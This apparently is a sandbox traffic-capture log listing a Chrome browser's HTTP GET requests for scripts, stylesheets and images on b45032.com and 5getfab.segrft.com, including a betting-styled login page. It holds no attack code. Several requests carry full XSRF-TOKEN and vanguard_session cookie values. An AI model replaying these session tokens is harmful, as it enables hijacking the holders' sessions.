vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
Source: global trafficHTTP traffic detected: GET /plus/css/unite/login_unite.css?ver=1614680240 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/custom/login_custom.css?ver=1663905027 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/unite/header_unite.css?ver=1618279364 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/custom/header_custom.css?ver=1685593131 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plugins/jquery-ui/jquery-ui.min.css?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/jquery.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plugins/jquery-ui/jquery-ui.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/custom/checkinput.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/swiper.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/sweetalert.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/jquery-migrate.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/jquery-ui.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/custom/main.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/unite/share_unite.js?ver=1661222874 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gdcode_1736725656 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
Source: global trafficHTTP traffic detected: GET /js/www/login.js?ver=1606790076 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/jquery.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/jquery-migrate.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/custom/checkinput.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/sweetalert.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/unite/jsencrypt.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/unite/encforms.js?ver=1723544858 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/cms/cms_1045.png?v=1611754636 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/swiper.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plugins/jquery-ui/jquery-ui.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/custom/login_custom.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/custom/moment.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/custom/moment-timezone.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/header/common/spiler.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/common/bet365_style.css?ver=1684314915Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gdcode_1736725656 HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjFzNTJBYWlhUVE2cm9IaVFueENOV2c9PSIsInZhbHVlIjoiYUc5ZDZYYWI2MHNkaERZRzlGWmYzcDI5RU1Tak5xZkZhbmJ2aERFSVo2WHFjaVFwWENHVGtUR2c3TDVJRUord3lwVWtNUjR0cmhMcnhqS0VlYVkxOWc9PSIsIm1hYyI6IjlkOTRmMGQyZTFjMjk0OWZjN2MxNWE4NDEzN2RmN2QxZWRkOTRjYjc5NmI0OGY0MWJkMzk4NjVkOTczNGMyMzIifQ%3D%3D; vanguard_session=eyJpdiI6InFxdUZ6ek0zT2J2bzY4VWt6WXJhVUE9PSIsInZhbHVlIjoiS1wvcUtlNnpZRkgwcUUwUm41RUdOTHo1aTNNeWZZR3lDQUtpNDhXeXlcLzdDMks2QmhDQ1wvbStXSEkxVUtzZFA3OUxRbFFxM1dER3RkemFlY2VGVlJVRkE9PSIsIm1hYyI6ImM3Zjg4MzBlNGE0OGJmZTQ0OTM5ZWQzODRlOGQxNjJhMmQwMmQ4NWZhODI5YWE4MGRkMGM0ZjI0OWQ2MWE3YzUifQ%3D%3D
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/jquery-ui.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/header/common/kefu_icon.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/custom/header_custom.css?ver=1685593131Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/custom/main.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/unite/share_unite.js?ver=1661222874 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/cms/cms_1045.png?v=1611754636 HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjFzNTJBYWlhUVE2cm9IaVFueENOV2c9PSIsInZhbHVlIjoiYUc5ZDZYYWI2MHNkaERZRzlGWmYzcDI5RU1Tak5xZkZhbmJ2aERFSVo2WHFjaVFwWENHVGtUR2c3TDVJRUord3lwVWtNUjR0cmhMcnhqS0VlYVkxOWc9PSIsIm1hYyI6IjlkOTRmMGQyZTFjMjk0OWZjN2MxNWE4NDEzN2RmN2QxZWRkOTRjYjc5NmI0OGY0MWJkMzk4NjVkOTczNGMyMzIifQ%3D%3D; vanguard_session=eyJpdiI6InFxdUZ6ek0zT2J2bzY4VWt6WXJhVUE9PSIsInZhbHVlIjoiS1wvcUtlNnpZRkgwcUUwUm41RUdOTHo1aTNNeWZZR3lDQUtpNDhXeXlcLzdDMks2QmhDQ1wvbStXSEkxVUtzZFA3OUxRbFFxM1dER3RkemFlY2VGVlJVRkE9PSIsIm1hYyI6ImM3Zjg4MzBlNGE0OGJmZTQ0OTM5ZWQzODRlOGQxNjJhMmQwMmQ4NWZhODI5YWE4MGRkMGM0ZjI0OWQ2MWE3YzUifQ%3D%3D
Source: global trafficHTTP traffic detected: GET /js/www/login.js?ver=1606790076 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/main/logo.gif?ver=1612840274 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/dc_hot.gif?ver=1606790076 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
